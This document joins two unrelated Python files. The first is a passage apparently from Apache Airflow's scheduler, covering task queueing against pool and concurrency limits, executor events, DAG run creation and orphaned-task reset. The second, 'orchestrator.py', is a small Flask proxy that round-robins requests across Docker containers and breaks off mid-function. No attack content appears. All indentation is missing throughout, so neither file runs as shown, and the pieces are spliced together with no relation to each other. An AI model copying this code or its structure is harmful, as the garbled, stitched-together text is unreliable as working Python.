# Stats.gauge('scheduler.tasks.pending', len(task_instances_to_examine))
if len(task_instances_to_examine) == 0:
self.log.debug("No tasks to consider for execution.")
return executable_tis
# Put one task instance on each line
task_instance_str = "\n\t".join(repr(x) for x in task_instances_to_examine)
self.log.info("%s tasks up for execution:\n\t%s", len(task_instances_to_examine), task_instance_str)
pool_to_task_instances: DefaultDict[str, List[models.Pool]] = defaultdict(list)
for task_instance in task_instances_to_examine:
pool_to_task_instances[task_instance.pool].append(task_instance)
# dag_id to # of running tasks and (dag_id, task_id) to # of running tasks.
dag_concurrency_map: DefaultDict[str, int]
task_concurrency_map: DefaultDict[Tuple[str, str], int]
dag_concurrency_map, task_concurrency_map = self.__get_concurrency_maps(
states=list(EXECUTION_STATES), session=session
)
num_tasks_in_executor = 0
# Number of tasks that cannot be scheduled because of no open slot in pool
num_starving_tasks_total = 0
# Go through each pool, and queue up a task for execution if there are
# any open slots in the pool.
# pylint: disable=too-many-nested-blocks
for pool, task_instances in pool_to_task_instances.items():
pool_name = pool
if pool not in pools:
self.log.warning("Tasks using non-existent pool '%s' will not be scheduled", pool)
continue
open_slots = pools[pool]["open"]
num_ready = len(task_instances)
self.log.info(
"Figuring out tasks to run in Pool(name=%s) with %s open slots "
"and %s task instances ready to be queued",
pool,
open_slots,
num_ready,
)
priority_sorted_task_instances = sorted(
task_instances, key=lambda ti: (-ti.priority_weight, ti.execution_date)
)
num_starving_tasks = 0
for current_index, task_instance in enumerate(priority_sorted_task_instances):
if open_slots <= 0:
self.log.info("Not scheduling since there are %s open slots in pool %s", open_slots, pool)
# Can't schedule any more since there are no more open slots.
num_unhandled = len(priority_sorted_task_instances) - current_index
num_starving_tasks += num_unhandled
num_starving_tasks_total += num_unhandled
break
# Check to make sure that the task concurrency of the DAG hasn't been
# reached.
dag_id = task_instance.dag_id
current_dag_concurrency = dag_concurrency_map[dag_id]
dag_concurrency_limit = task_instance.dag_model.concurrency
self.log.info(
"DAG %s has %s/%s running and queued tasks",
dag_id,
current_dag_concurrency,
dag_concurrency_limit,
)
if current_dag_concurrency >= dag_concurrency_limit:
self.log.info(
"Not executing %s since the number of tasks running or queued "
"from DAG %s is >= to the DAG's task concurrency limit of %s",
task_instance,
dag_id,
dag_concurrency_limit,
)
continue
task_concurrency_limit: Optional[int] = None
if task_instance.dag_model.has_task_concurrency_limits:
# Many dags don't have a task_concurrency, so where we can avoid loading the full
# serialized DAG the better.
serialized_dag = self.dagbag.get_dag(dag_id, session=session)
if serialized_dag.has_task(task_instance.task_id):
task_concurrency_limit = serialized_dag.get_task(
task_instance.task_id
).task_concurrency
if task_concurrency_limit is not None:
current_task_concurrency = task_concurrency_map[
(task_instance.dag_id, task_instance.task_id)
]
if current_task_concurrency >= task_concurrency_limit:
self.log.info(
"Not executing %s since the task concurrency for"
" this task has been reached.",
task_instance,
)
continue
if task_instance.pool_slots > open_slots:
self.log.info(
"Not executing %s since it requires %s slots "
"but there are %s open slots in the pool %s.",
task_instance,
task_instance.pool_slots,
open_slots,
pool,
)
num_starving_tasks += 1
num_starving_tasks_total += 1
# Though we can execute tasks with lower priority if there's enough room
continue
executable_tis.append(task_instance)
open_slots -= task_instance.pool_slots
dag_concurrency_map[dag_id] += 1
task_concurrency_map[(task_instance.dag_id, task_instance.task_id)] += 1
Stats.gauge(f'pool.starving_tasks.{pool_name}', num_starving_tasks)
Stats.gauge('scheduler.tasks.starving', num_starving_tasks_total)
Stats.gauge('scheduler.tasks.running', num_tasks_in_executor)
Stats.gauge('scheduler.tasks.executable', len(executable_tis))
task_instance_str = "\n\t".join(repr(x) for x in executable_tis)
self.log.info("Setting the following tasks to queued state:\n\t%s", task_instance_str)
if len(executable_tis) > 0:
# set TIs to queued state
filter_for_tis = TI.filter_for_tis(executable_tis)
session.query(TI).filter(filter_for_tis).update(
# TODO[ha]: should we use func.now()? How does that work with DB timezone
# on mysql when it's not UTC?
{TI.state: State.QUEUED, TI.queued_dttm: timezone.utcnow(), TI.queued_by_job_id: self.id},
synchronize_session=False,
)
for ti in executable_tis:
make_transient(ti)
return executable_tis
def _enqueue_task_instances_with_queued_state(self, task_instances: List[TI]) -> None:
"""
Takes task_instances, which should have been set to queued, and enqueues them
with the executor.
:param task_instances: TaskInstances to enqueue
:type task_instances: list[TaskInstance]
"""
# actually enqueue them
for ti in task_instances:
command = TI.generate_command(
ti.dag_id,
ti.task_id,
ti.execution_date,
local=True,
mark_success=False,
ignore_all_deps=False,
ignore_depends_on_past=False,
ignore_task_deps=False,
ignore_ti_state=False,
pool=ti.pool,
file_path=ti.dag_model.fileloc,
pickle_id=ti.dag_model.pickle_id,
)
priority = ti.priority_weight
queue = ti.queue
self.log.info("Sending %s to executor with priority %s and queue %s", ti.key, priority, queue)
self.executor.queue_command(
ti,
command,
priority=priority,
queue=queue,
)
def _critical_section_execute_task_instances(self, session: Session) -> int:
"""
Attempts to execute TaskInstances that should be executed by the scheduler.
There are three steps:
1. Pick TIs by priority with the constraint that they are in the expected states
and that we do exceed max_active_runs or pool limits.
2. Change the state for the TIs above atomically.
3. Enqueue the TIs in the executor.
HA note: This function is a "critical section" meaning that only a single executor process can execute
this function at the same time. This is achieved by doing ``SELECT ... from pool FOR UPDATE``. For DBs
that support NOWAIT, a "blocked" scheduler will skip this and continue on with other tasks (creating
new DAG runs, progressing TIs from None to SCHEDULED etc.); DBs that don't support this (such as
MariaDB or MySQL 5.x) the other schedulers will wait for the lock before continuing.
:param session:
:type session: sqlalchemy.orm.Session
:return: Number of task instance with state changed.
"""
if self.max_tis_per_query == 0:
max_tis = self.executor.slots_available
else:
max_tis = min(self.max_tis_per_query, self.executor.slots_available)
queued_tis = self._executable_task_instances_to_queued(max_tis, session=session)
self._enqueue_task_instances_with_queued_state(queued_tis)
return len(queued_tis)
@provide_session
def _change_state_for_tasks_failed_to_execute(self, session: Session = None):
"""
If there are tasks left over in the executor,
we set them back to SCHEDULED to avoid creating hanging tasks.
:param session: session for ORM operations
"""
if not self.executor.queued_tasks:
return
filter_for_ti_state_change = [
and_(
TI.dag_id == dag_id,
TI.task_id == task_id,
TI.execution_date == execution_date,
# The TI.try_number will return raw try_number+1 since the
# ti is not running. And we need to -1 to match the DB record.
TI._try_number == try_number - 1, # pylint: disable=protected-access
TI.state == State.QUEUED,
)
for dag_id, task_id, execution_date, try_number in self.executor.queued_tasks.keys()
]
ti_query = session.query(TI).filter(or_(*filter_for_ti_state_change))
tis_to_set_to_scheduled: List[TI] = with_row_locks(ti_query, session=session).all()
if not tis_to_set_to_scheduled:
return
# set TIs to queued state
filter_for_tis = TI.filter_for_tis(tis_to_set_to_scheduled)
session.query(TI).filter(filter_for_tis).update(
{TI.state: State.SCHEDULED, TI.queued_dttm: None}, synchronize_session=False
)
for task_instance in tis_to_set_to_scheduled:
self.executor.queued_tasks.pop(task_instance.key)
task_instance_str = "\n\t".join(repr(x) for x in tis_to_set_to_scheduled)
self.log.info("Set the following tasks to scheduled state:\n\t%s", task_instance_str)
@provide_session
def _process_executor_events(self, session: Session = None) -> int:
"""Respond to executor events."""
if not self.processor_agent:
raise ValueError("Processor agent is not started.")
ti_primary_key_to_try_number_map: Dict[Tuple[str, str, datetime.datetime], int] = {}
event_buffer = self.executor.get_event_buffer()
tis_with_right_state: List[TaskInstanceKey] = []
# Report execution
for ti_key, value in event_buffer.items():
state: str
state, _ = value
# We create map (dag_id, task_id, execution_date) -> in-memory try_number
ti_primary_key_to_try_number_map[ti_key.primary] = ti_key.try_number
self.log.info(
"Executor reports execution of %s.%s execution_date=%s "
"exited with status %s for try_number %s",
ti_key.dag_id,
ti_key.task_id,
ti_key.execution_date,
state,
ti_key.try_number,
)
if state in (State.FAILED, State.SUCCESS, State.QUEUED):
tis_with_right_state.append(ti_key)
# Return if no finished tasks
if not tis_with_right_state:
return len(event_buffer)
# Check state of finished tasks
filter_for_tis = TI.filter_for_tis(tis_with_right_state)
tis: List[TI] = session.query(TI).filter(filter_for_tis).options(selectinload('dag_model')).all()
for ti in tis:
try_number = ti_primary_key_to_try_number_map[ti.key.primary]
buffer_key = ti.key.with_try_number(try_number)
state, info = event_buffer.pop(buffer_key)
# TODO: should we fail RUNNING as well, as we do in Backfills?
if state == State.QUEUED:
ti.external_executor_id = info
self.log.info("Setting external_id for %s to %s", ti, info)
continue
if ti.try_number == buffer_key.try_number and ti.state == State.QUEUED:
Stats.incr('scheduler.tasks.killed_externally')
msg = (
"Executor reports task instance %s finished (%s) although the "
"task says its %s. (Info: %s) Was the task killed externally?"
)
self.log.error(msg, ti, state, ti.state, info)
request = TaskCallbackRequest(
full_filepath=ti.dag_model.fileloc,
simple_task_instance=SimpleTaskInstance(ti),
msg=msg % (ti, state, ti.state, info),
)
self.log.info('Setting task instance %s state to %s as reported by executor', ti, state)
ti.set_state(state)
self.processor_agent.send_callback_to_execute(request)
return len(event_buffer)
def _execute(self) -> None:
self.log.info("Starting the scheduler")
# DAGs can be pickled for easier remote execution by some executors
pickle_dags = self.do_pickle and self.executor_class not in UNPICKLEABLE_EXECUTORS
self.log.info("Processing each file at most %s times", self.num_times_parse_dags)
# When using sqlite, we do not use async_mode
# so the scheduler job and DAG parser don't access the DB at the same time.
async_mode = not self.using_sqlite
processor_timeout_seconds: int = conf.getint('core', 'dag_file_processor_timeout')
processor_timeout = timedelta(seconds=processor_timeout_seconds)
self.processor_agent = DagFileProcessorAgent(
dag_directory=self.subdir,
max_runs=self.num_times_parse_dags,
processor_factory=type(self)._create_dag_file_processor,
processor_timeout=processor_timeout,
dag_ids=[],
pickle_dags=pickle_dags,
async_mode=async_mode,
)
try:
self.executor.job_id = self.id
self.executor.start()
self.register_signals()
self.processor_agent.start()
execute_start_time = timezone.utcnow()
self._run_scheduler_loop()
# Stop any processors
self.processor_agent.terminate()
# Verify that all files were processed, and if so, deactivate DAGs that
# haven't been touched by the scheduler as they likely have been
# deleted.
if self.processor_agent.all_files_processed:
self.log.info(
"Deactivating DAGs that haven't been touched since %s", execute_start_time.isoformat()
)
models.DAG.deactivate_stale_dags(execute_start_time)
settings.Session.remove() # type: ignore
except Exception: # pylint: disable=broad-except
self.log.exception("Exception when executing SchedulerJob._run_scheduler_loop")
raise
finally:
try:
self.executor.end()
except Exception: # pylint: disable=broad-except
self.log.exception("Exception when executing Executor.end")
try:
self.processor_agent.end()
except Exception: # pylint: disable=broad-except
self.log.exception("Exception when executing DagFileProcessorAgent.end")
self.log.info("Exited execute loop")
@staticmethod
def _create_dag_file_processor(
file_path: str,
callback_requests: List[CallbackRequest],
dag_ids: Optional[List[str]],
pickle_dags: bool,
) -> DagFileProcessorProcess:
"""Creates DagFileProcessorProcess instance."""
return DagFileProcessorProcess(
file_path=file_path, pickle_dags=pickle_dags, dag_ids=dag_ids, callback_requests=callback_requests
)
def _run_scheduler_loop(self) -> None:
"""
The actual scheduler loop. The main steps in the loop are:
#. Harvest DAG parsing results through DagFileProcessorAgent
#. Find and queue executable tasks
#. Change task instance state in DB
#. Queue tasks in executor
#. Heartbeat executor
#. Execute queued tasks in executor asynchronously
#. Sync on the states of running tasks
Following is a graphic representation of these steps.
.. image:: ../docs/apache-airflow/img/scheduler_loop.jpg
:rtype: None
"""
if not self.processor_agent:
raise ValueError("Processor agent is not started.")
is_unit_test: bool = conf.getboolean('core', 'unit_test_mode')
timers = EventScheduler()
# Check on start up, then every configured interval
self.adopt_or_reset_orphaned_tasks()
timers.call_regular_interval(
conf.getfloat('scheduler', 'orphaned_tasks_check_interval', fallback=300.0),
self.adopt_or_reset_orphaned_tasks,
)
timers.call_regular_interval(
conf.getfloat('scheduler', 'pool_metrics_interval', fallback=5.0),
self._emit_pool_metrics,
)
timers.call_regular_interval(
conf.getfloat('scheduler', 'clean_tis_without_dagrun_interval', fallback=15.0),
self._clean_tis_without_dagrun,
)
for loop_count in itertools.count(start=1):
with Stats.timer() as timer:
if self.using_sqlite:
self.processor_agent.run_single_parsing_loop()
# For the sqlite case w/ 1 thread, wait until the processor
# is finished to avoid concurrent access to the DB.
self.log.debug("Waiting for processors to finish since we're using sqlite")
self.processor_agent.wait_until_finished()
with create_session() as session:
num_queued_tis = self._do_scheduling(session)
self.executor.heartbeat()
session.expunge_all()
num_finished_events = self._process_executor_events(session=session)
self.processor_agent.heartbeat()
# Heartbeat the scheduler periodically
self.heartbeat(only_if_necessary=True)
# Run any pending timed events
next_event = timers.run(blocking=False)
self.log.debug("Next timed event is in %f", next_event)
self.log.debug("Ran scheduling loop in %.2f seconds", timer.duration)
if not is_unit_test and not num_queued_tis and not num_finished_events:
# If the scheduler is doing things, don't sleep. This means when there is work to do, the
# scheduler will run "as quick as possible", but when it's stopped, it can sleep, dropping CPU
# usage when "idle"
time.sleep(min(self._processor_poll_interval, next_event))
if loop_count >= self.num_runs > 0:
self.log.info(
"Exiting scheduler loop as requested number of runs (%d - got to %d) has been reached",
self.num_runs,
loop_count,
)
break
if self.processor_agent.done:
self.log.info(
"Exiting scheduler loop as requested DAG parse count (%d) has been reached after %d"
" scheduler loops",
self.num_times_parse_dags,
loop_count,
)
break
@provide_session
def _clean_tis_without_dagrun(self, session):
with prohibit_commit(session) as guard:
try:
self._change_state_for_tis_without_dagrun(
old_states=[State.UP_FOR_RETRY], new_state=State.FAILED, session=session
)
self._change_state_for_tis_without_dagrun(
old_states=[State.QUEUED, State.SCHEDULED, State.UP_FOR_RESCHEDULE, State.SENSING],
new_state=State.NONE,
session=session,
)
guard.commit()
except OperationalError as e:
if is_lock_not_available_error(error=e):
self.log.debug("Lock held by another Scheduler")
session.rollback()
else:
raise
guard.commit()
def _do_scheduling(self, session) -> int:
"""
This function is where the main scheduling decisions take places. It:
- Creates any necessary DAG runs by examining the next_dagrun_create_after column of DagModel
Since creating Dag Runs is a relatively time consuming process, we select only 10 dags by default
(configurable via ``scheduler.max_dagruns_to_create_per_loop`` setting) - putting this higher will
mean one scheduler could spend a chunk of time creating dag runs, and not ever get around to
scheduling tasks.
- Finds the "next n oldest" running DAG Runs to examine for scheduling (n=20 by default, configurable
via ``scheduler.max_dagruns_per_loop_to_schedule`` config setting) and tries to progress state (TIs
to SCHEDULED, or DagRuns to SUCCESS/FAILURE etc)
By "next oldest", we mean hasn't been examined/scheduled in the most time.
The reason we don't select all dagruns at once because the rows are selected with row locks, meaning
that only one scheduler can "process them", even it is waiting behind other dags. Increasing this
limit will allow more throughput for smaller DAGs but will likely slow down throughput for larger
(>500 tasks.) DAGs
- Then, via a Critical Section (locking the rows of the Pool model) we queue tasks, and then send them
to the executor.
See docs of _critical_section_execute_task_instances for more.
:return: Number of TIs enqueued in this iteration
:rtype: int
"""
# Put a check in place to make sure we don't commit unexpectedly
with prohibit_commit(session) as guard:
if settings.USE_JOB_SCHEDULE:
self._create_dagruns_for_dags(guard, session)
dag_runs = self._get_next_dagruns_to_examine(session)
# Bulk fetch the currently active dag runs for the dags we are
# examining, rather than making one query per DagRun
# TODO: This query is probably horribly inefficient (though there is an
# index on (dag_id,state)). It is to deal with the case when a user
# clears more than max_active_runs older tasks -- we don't want the
# scheduler to suddenly go and start running tasks from all of the
# runs. (AIRFLOW-137/GH #1442)
#
# The longer term fix would be to have `clear` do this, and put DagRuns
# in to the queued state, then take DRs out of queued before creating
# any new ones
# Build up a set of execution_dates that are "active" for a given
# dag_id -- only tasks from those runs will be scheduled.
active_runs_by_dag_id = defaultdict(set)
query = (
session.query(
TI.dag_id,
TI.execution_date,
)
.filter(
TI.dag_id.in_(list({dag_run.dag_id for dag_run in dag_runs})),
TI.state.notin_(list(State.finished) + [State.REMOVED]),
)
.group_by(TI.dag_id, TI.execution_date)
)
for dag_id, execution_date in query:
active_runs_by_dag_id[dag_id].add(execution_date)
for dag_run in dag_runs:
# Use try_except to not stop the Scheduler when a Serialized DAG is not found
# This takes care of Dynamic DAGs especially
# SerializedDagNotFound should not happen here in the same loop because the DagRun would
# not be created in self._create_dag_runs if Serialized DAG does not exist
# But this would take care of the scenario when the Scheduler is restarted after DagRun is
# created and the DAG is deleted / renamed
try:
self._schedule_dag_run(dag_run, active_runs_by_dag_id.get(dag_run.dag_id, set()), session)
except SerializedDagNotFound:
self.log.exception("DAG '%s' not found in serialized_dag table", dag_run.dag_id)
continue
guard.commit()
# Without this, the session has an invalid view of the DB
session.expunge_all()
# END: schedule TIs
try:
if self.executor.slots_available <= 0:
# We know we can't do anything here, so don't even try!
self.log.debug("Executor full, skipping critical section")
return 0
timer = Stats.timer('scheduler.critical_section_duration')
timer.start()
# Find anything TIs in state SCHEDULED, try to QUEUE it (send it to the executor)
num_queued_tis = self._critical_section_execute_task_instances(session=session)
# Make sure we only sent this metric if we obtained the lock, otherwise we'll skew the
# metric, way down
timer.stop(send=True)
except OperationalError as e:
timer.stop(send=False)
if is_lock_not_available_error(error=e):
self.log.debug("Critical section lock held by another Scheduler")
Stats.incr('scheduler.critical_section_busy')
session.rollback()
return 0
raise
guard.commit()
return num_queued_tis
@retry_db_transaction
def _get_next_dagruns_to_examine(self, session):
"""Get Next DagRuns to Examine with retries"""
return DagRun.next_dagruns_to_examine(session)
@retry_db_transaction
def _create_dagruns_for_dags(self, guard, session):
"""Find Dag Models needing DagRuns and Create Dag Runs with retries in case of OperationalError"""
query = DagModel.dags_needing_dagruns(session)
self._create_dag_runs(query.all(), session)
# commit the session - Release the write lock on DagModel table.
guard.commit()
# END: create dagruns
def _create_dag_runs(self, dag_models: Iterable[DagModel], session: Session) -> None:
"""
Unconditionally create a DAG run for the given DAG, and update the dag_model's fields to control
if/when the next DAGRun should be created
"""
# Bulk Fetch DagRuns with dag_id and execution_date same
# as DagModel.dag_id and DagModel.next_dagrun
# This list is used to verify if the DagRun already exist so that we don't attempt to create
# duplicate dag runs
if session.bind.dialect.name == 'mssql':
active_dagruns_filter = or_(
*[
and_(
DagRun.dag_id == dm.dag_id,
DagRun.execution_date == dm.next_dagrun,
)
for dm in dag_models
]
)
else:
active_dagruns_filter = tuple_(DagRun.dag_id, DagRun.execution_date).in_(
[(dm.dag_id, dm.next_dagrun) for dm in dag_models]
)
active_dagruns = (
session.query(DagRun.dag_id, DagRun.execution_date).filter(active_dagruns_filter).all()
)
for dag_model in dag_models:
try:
dag = self.dagbag.get_dag(dag_model.dag_id, session=session)
except SerializedDagNotFound:
self.log.exception("DAG '%s' not found in serialized_dag table", dag_model.dag_id)
continue
dag_hash = self.dagbag.dags_hash.get(dag.dag_id)
# Explicitly check if the DagRun already exists. This is an edge case
# where a Dag Run is created but `DagModel.next_dagrun` and `DagModel.next_dagrun_create_after`
# are not updated.
# We opted to check DagRun existence instead
# of catching an Integrity error and rolling back the session i.e
# we need to run self._update_dag_next_dagruns if the Dag Run already exists or if we
# create a new one. This is so that in the next Scheduling loop we try to create new runs
# instead of falling in a loop of Integrity Error.
if (dag.dag_id, dag_model.next_dagrun) not in active_dagruns:
run = dag.create_dagrun(
run_type=DagRunType.SCHEDULED,
execution_date=dag_model.next_dagrun,
start_date=timezone.utcnow(),
state=State.RUNNING,
external_trigger=False,
session=session,
dag_hash=dag_hash,
creating_job_id=self.id,
)
expected_start_date = dag.following_schedule(run.execution_date)
if expected_start_date:
schedule_delay = run.start_date - expected_start_date
Stats.timing(
f'dagrun.schedule_delay.{dag.dag_id}',
schedule_delay,
)
self._update_dag_next_dagruns(dag_models, session)
# TODO[HA]: Should we do a session.flush() so we don't have to keep lots of state/object in
# memory for larger dags? or expunge_all()
def _update_dag_next_dagruns(self, dag_models: Iterable[DagModel], session: Session) -> None:
"""
Bulk update the next_dagrun and next_dagrun_create_after for all the dags.
We batch the select queries to get info about all the dags at once
"""
# Check max_active_runs, to see if we are _now_ at the limit for any of
# these dag? (we've just created a DagRun for them after all)
active_runs_of_dags = dict(
session.query(DagRun.dag_id, func.count('*'))
.filter(
DagRun.dag_id.in_([o.dag_id for o in dag_models]),
DagRun.state == State.RUNNING, # pylint: disable=comparison-with-callable
DagRun.external_trigger == expression.false(),
)
.group_by(DagRun.dag_id)
.all()
)
for dag_model in dag_models:
# Get the DAG in a try_except to not stop the Scheduler when a Serialized DAG is not found
# This takes care of Dynamic DAGs especially
try:
dag = self.dagbag.get_dag(dag_model.dag_id, session=session)
except SerializedDagNotFound:
self.log.exception("DAG '%s' not found in serialized_dag table", dag_model.dag_id)
continue
active_runs_of_dag = active_runs_of_dags.get(dag.dag_id, 0)
if dag.max_active_runs and active_runs_of_dag >= dag.max_active_runs:
self.log.info(
"DAG %s is at (or above) max_active_runs (%d of %d), not creating any more runs",
dag.dag_id,
active_runs_of_dag,
dag.max_active_runs,
)
dag_model.next_dagrun_create_after = None
else:
dag_model.next_dagrun, dag_model.next_dagrun_create_after = dag.next_dagrun_info(
dag_model.next_dagrun
)
def _schedule_dag_run(
self,
dag_run: DagRun,
currently_active_runs: Set[datetime.datetime],
session: Session,
) -> int:
"""
Make scheduling decisions about an individual dag run
``currently_active_runs`` is passed in so that a batch query can be
used to ask this for all dag runs in the batch, to avoid an n+1 query.
:param dag_run: The DagRun to schedule
:param currently_active_runs: Number of currently active runs of this DAG
:return: Number of tasks scheduled
"""
dag = dag_run.dag = self.dagbag.get_dag(dag_run.dag_id, session=session)
if not dag:
self.log.error("Couldn't find dag %s in DagBag/DB!", dag_run.dag_id)
return 0
if (
dag_run.start_date
and dag.dagrun_timeout
and dag_run.start_date < timezone.utcnow() - dag.dagrun_timeout
):
dag_run.set_state(State.FAILED)
unfinished_task_instances = (
session.query(TI)
.filter(TI.dag_id == dag_run.dag_id)
.filter(TI.execution_date == dag_run.execution_date)
.filter(TI.state.in_(State.unfinished))
)
for task_instance in unfinished_task_instances:
task_instance.state = State.SKIPPED
session.merge(task_instance)
session.flush()
self.log.info("Run %s of %s has timed-out", dag_run.run_id, dag_run.dag_id)
# Work out if we should allow creating a new DagRun now?
self._update_dag_next_dagruns([session.query(DagModel).get(dag_run.dag_id)], session)
callback_to_execute = DagCallbackRequest(
full_filepath=dag.fileloc,
dag_id=dag.dag_id,
execution_date=dag_run.execution_date,
is_failure_callback=True,
msg='timed_out',
)
# Send SLA & DAG Success/Failure Callbacks to be executed
self._send_dag_callbacks_to_processor(dag_run, callback_to_execute)
return 0
if dag_run.execution_date > timezone.utcnow() and not dag.allow_future_exec_dates:
self.log.error("Execution date is in future: %s", dag_run.execution_date)
return 0
if dag.max_active_runs:
if (
len(currently_active_runs) >= dag.max_active_runs
and dag_run.execution_date not in currently_active_runs
):
self.log.info(
"DAG %s already has %d active runs, not queuing any tasks for run %s",
dag.dag_id,
len(currently_active_runs),
dag_run.execution_date,
)
return 0
self._verify_integrity_if_dag_changed(dag_run=dag_run, session=session)
# TODO[HA]: Rename update_state -> schedule_dag_run, ?? something else?
schedulable_tis, callback_to_run = dag_run.update_state(session=session, execute_callbacks=False)
self._send_dag_callbacks_to_processor(dag_run, callback_to_run)
# This will do one query per dag run. We "could" build up a complex
# query to update all the TIs across all the execution dates and dag
# IDs in a single query, but it turns out that can be _very very slow_
# see #11147/commit ee90807ac for more details
return dag_run.schedule_tis(schedulable_tis, session)
@provide_session
def _verify_integrity_if_dag_changed(self, dag_run: DagRun, session=None):
"""Only run DagRun.verify integrity if Serialized DAG has changed since it is slow"""
latest_version = SerializedDagModel.get_latest_version_hash(dag_run.dag_id, session=session)
if dag_run.dag_hash == latest_version:
self.log.debug("DAG %s not changed structure, skipping dagrun.verify_integrity", dag_run.dag_id)
return
dag_run.dag_hash = latest_version
# Refresh the DAG
dag_run.dag = self.dagbag.get_dag(dag_id=dag_run.dag_id, session=session)
# Verify integrity also takes care of session.flush
dag_run.verify_integrity(session=session)
def _send_dag_callbacks_to_processor(
self, dag_run: DagRun, callback: Optional[DagCallbackRequest] = None
):
if not self.processor_agent:
raise ValueError("Processor agent is not started.")
dag = dag_run.get_dag()
self._send_sla_callbacks_to_processor(dag)
if callback:
self.processor_agent.send_callback_to_execute(callback)
def _send_sla_callbacks_to_processor(self, dag: DAG):
"""Sends SLA Callbacks to DagFileProcessor if tasks have SLAs set and check_slas=True"""
if not settings.CHECK_SLAS:
return
if not any(isinstance(ti.sla, timedelta) for ti in dag.tasks):
self.log.debug("Skipping SLA check for %s because no tasks in DAG have SLAs", dag)
return
if not self.processor_agent:
raise ValueError("Processor agent is not started.")
self.processor_agent.send_sla_callback_request_to_execute(
full_filepath=dag.fileloc, dag_id=dag.dag_id
)
@provide_session
def _emit_pool_metrics(self, session: Session = None) -> None:
pools = models.Pool.slots_stats(session=session)
for pool_name, slot_stats in pools.items():
Stats.gauge(f'pool.open_slots.{pool_name}', slot_stats["open"])
Stats.gauge(f'pool.queued_slots.{pool_name}', slot_stats[State.QUEUED]) # type: ignore
Stats.gauge(f'pool.running_slots.{pool_name}', slot_stats[State.RUNNING]) # type: ignore
@provide_session
def heartbeat_callback(self, session: Session = None) -> None:
Stats.incr('scheduler_heartbeat', 1, 1)
@provide_session
def adopt_or_reset_orphaned_tasks(self, session: Session = None):
"""
Reset any TaskInstance still in QUEUED or SCHEDULED states that were
enqueued by a SchedulerJob that is no longer running.
:return: the number of TIs reset
:rtype: int
"""
self.log.info("Resetting orphaned tasks for active dag runs")
timeout = conf.getint('scheduler', 'scheduler_health_check_threshold')
for attempt in run_with_db_retries(logger=self.log):
with attempt:
self.log.debug(
"Running SchedulerJob.adopt_or_reset_orphaned_tasks with retries. Try %d of %d",
attempt.retry_state.attempt_number,
MAX_DB_RETRIES,
)
self.log.debug("Calling SchedulerJob.adopt_or_reset_orphaned_tasks method")
try:
num_failed = (
session.query(SchedulerJob)
.filter(
SchedulerJob.state == State.RUNNING,
SchedulerJob.latest_heartbeat < (timezone.utcnow() - timedelta(seconds=timeout)),
)
.update({"state": State.FAILED})
)
if num_failed:
self.log.info("Marked %d SchedulerJob instances as failed", num_failed)
Stats.incr(self.__class__.__name__.lower() + '_end', num_failed)
resettable_states = [State.SCHEDULED, State.QUEUED, State.RUNNING]
query = (
session.query(TI)
.filter(TI.state.in_(resettable_states))
# outerjoin is because we didn't use to have queued_by_job
# set, so we need to pick up anything pre upgrade. This (and the
# "or queued_by_job_id IS NONE") can go as soon as scheduler HA is
# released.
.outerjoin(TI.queued_by_job)
.filter(or_(TI.queued_by_job_id.is_(None), SchedulerJob.state != State.RUNNING))
.join(TI.dag_run)
.filter(
DagRun.run_type != DagRunType.BACKFILL_JOB,
# pylint: disable=comparison-with-callable
DagRun.state == State.RUNNING,
)
.options(load_only(TI.dag_id, TI.task_id, TI.execution_date))
)
# Lock these rows, so that another scheduler can't try and adopt these too
tis_to_reset_or_adopt = with_row_locks(
query, of=TI, session=session, **skip_locked(session=session)
).all()
to_reset = self.executor.try_adopt_task_instances(tis_to_reset_or_adopt)
reset_tis_message = []
for ti in to_reset:
reset_tis_message.append(repr(ti))
ti.state = State.NONE
ti.queued_by_job_id = None
for ti in set(tis_to_reset_or_adopt) - set(to_reset):
ti.queued_by_job_id = self.id
Stats.incr('scheduler.orphaned_tasks.cleared', len(to_reset))
Stats.incr('scheduler.orphaned_tasks.adopted', len(tis_to_reset_or_adopt) - len(to_reset))
if to_reset:
task_instance_str = '\n\t'.join(reset_tis_message)
self.log.info(
"Reset the following %s orphaned TaskInstances:\n\t%s",
len(to_reset),
task_instance_str,
)
# Issue SQL/finish "Unit of Work", but let @provide_session
# commit (or if passed a session, let caller decide when to commit
session.flush()
except OperationalError:
session.rollback()
raise
return len(to_reset)
|
orchestrator.py
|
from flask import Flask, render_template, request, redirect, abort, jsonify
import threading
import requests
import time, signal, sys
import docker
from tornado.wsgi import WSGIContainer
from tornado.httpserver import HTTPServer
from tornado.ioloop import IOLoop
ip = "http://127.0.0.1:"
apis = ['/api/v1/_count',
'/api/v1/_health',
'/api/v1/_crash',
'/api/v1/categories',
'/api/v1/categories/<categoryName>/acts/size',
'/api/v1/categories/<categoryName>/acts',
'/api/v1/categories/<categoryName>',
'/api/v1/acts/count',
'/api/v1/acts/upvote',
'/api/v1/acts/<actId>',
'/api/v1/acts']
app = Flask(__name__)
sem1 = threading.Semaphore()
sem2 = threading.Semaphore()
class roundrobin(object):
"""docstring for roundrobin"""
def __init__(self):
super(roundrobin, self).__init__()
self.containers = []
self.next = -1
self.size = 0
self.tot_reqs = 0
self.client = docker.from_env()
def getnext(self):
self.next = (self.next + 1) % self.size
return self.containers[self.next]["port"]
def startnewcontainer(self, port, idx):
#self.next = -1
cont = self.client.containers.run("acts", detach=True, ports={'80/tcp': port}, stop_signal="SIGINT")
if idx < self.size:
self.containers[idx] = {'id':cont.id, 'port':port}
else:
self.containers.append({'id':cont.id, 'port':port})
print(self.containers)
time.sleep(5)
self.size += 1
def stopcontainer(self, idx):
self.size -= 1
self.client.containers.get(self.containers[idx]['id']).stop()
time.sleep(5)
def __del__(self):
print("\ndestroying containers")
for ii, i in enumerate(self.containers):
self.stopcontainer(ii)
r = roundrobin()
@app.route('/', defaults={'path': ''})
@app.route('/<path:path>')
def hello(path):
global r, apis
path = '/' + path
if path == "/healthcheck":
return jsonify(success=True)
if (path not in apis) or r.size == 0:
abort(404)
if ((path != '/api/v1/_health') and (path != '/api/v1/_crash')):
if (r.tot_reqs == 0):
sem2.release()
print("releasing sem2")
r.tot_reqs += 1
port = r.getnext()
#return redirect("http://3.210.166.12:"+str(port)+path)
if request.method == "POST":
ret = requests.post(ip+str(port)+path)
elif request.method == "GET":
ret = requests.get(ip+str(port)+path)
else:
ret = requests.delete(ip+str(port)+path)
return jsonify(ret.text), ret.status_code
def fun1():
sem1.acquire()
sem2.acquire()
#app.debug=True
r.startnewcontainer(8000, 0)
sem1.release()
#app.run(host='0.0.0.0', port=80)
http_server = HTTPServer(WSGIContainer(app))
http_server.listen(80)
IOLoop.instance().start()
def fun2():
sem1.acquire()
print("sem1 acquired by fun2")
